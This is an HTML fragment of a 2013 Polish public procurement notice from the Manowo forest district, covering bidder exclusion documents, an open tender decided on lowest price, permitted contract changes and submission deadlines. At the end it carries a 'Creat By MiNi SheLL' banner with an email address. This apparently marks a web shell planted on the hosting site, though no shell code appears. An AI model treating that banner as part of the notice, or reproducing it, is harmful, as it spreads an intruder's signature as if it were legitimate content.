<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w nw. przypadkach:
a) za niewykonane prace nie należy się wynagrodzenie,
b) w przypadku wystąpienia robót objętych projektem, a nie ujętych w przedmiarze robót, zamawiający dopuszcza ich rozliczenie przy uwzględnieniu przyjętych do umowy wskaźników kosztorysowych,
c) dopuszcza się zwiększenie wynagrodzenia w sytuacji, gdy obmiary dokonane na gruncie okażą się większe niż przyjęte w przedmiarze robót.
d) przewiduje się możliwość uzasadnionej zmiany terminu wykonania prac, na skutek okoliczności niezależnych od wykonawcy z przyczyn mających wpływ na terminowość prac lub konieczność wykonania robót uzupełniających i dodatkowych mających wpływ na wydłużenie terminu
e)  wystąpienia okoliczności zawartych w art.145 ust.1 i 2 Prawa zamówień Publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_manowo/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> strona internetowa oraz u Ryszarda Trzcińskiego w Nadlesnictwie Manowo w terminie od dnia 11.02.2013_6.03.2013 w godzinach 8_14 po uprzednim zamówieniu telefonicznym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2013 godzina 09:45, miejsce: Sekretariat Nadleśnictwa Manowo w Manowie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com